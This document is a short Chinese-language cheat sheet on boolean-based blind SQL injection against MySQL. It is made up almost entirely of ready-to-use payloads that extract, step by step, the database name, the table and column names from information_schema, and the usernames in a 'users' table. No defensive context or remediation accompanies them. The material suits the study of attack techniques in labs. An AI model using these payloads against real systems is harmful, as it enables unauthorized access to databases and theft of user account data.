[TOC] ## 获取数据库名 **找到注入点，判断闭合情况 获取数据库名 先得到数据库名的长度** ~~~ and length(database())>5 ~~~ ## 再依次获取数据库名的每一个字符 ~~~ and ascii(substr(database(),1,1))>97 ~~~ ## 先获取表数量 ~~~ and (select count(\*) from information_schema.tables where table_schema=database())>5 ~~~ ## 再用limit依次获取每个表名的长度 ~~~ and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>5 ~~~ ## 最后获取每个表名的名字 ~~~ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97 ~~~ ## 先获取列名个数 ~~~ and (select count(*) from information_schema.columns where table_name='users' and table_schema=database())>5 ~~~ ## 再获取列名长度 ~~~ and (select length(column_name) from information_schema.columns where table_name='users’ and table_schema=database() limit 0,1)>5 ~~~ ## 最后获取列名 ~~~ and ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),1,1))>97 ~~~ ## 先确定第一个用户名长度 ~~~ and (select length(username) from users limit 0,1)>5 ~~~ ## 再确定用户名每一个字符的对应字母 ~~~ and ascii(substr((select username from users limit 0,1),1,1))>97 ~~~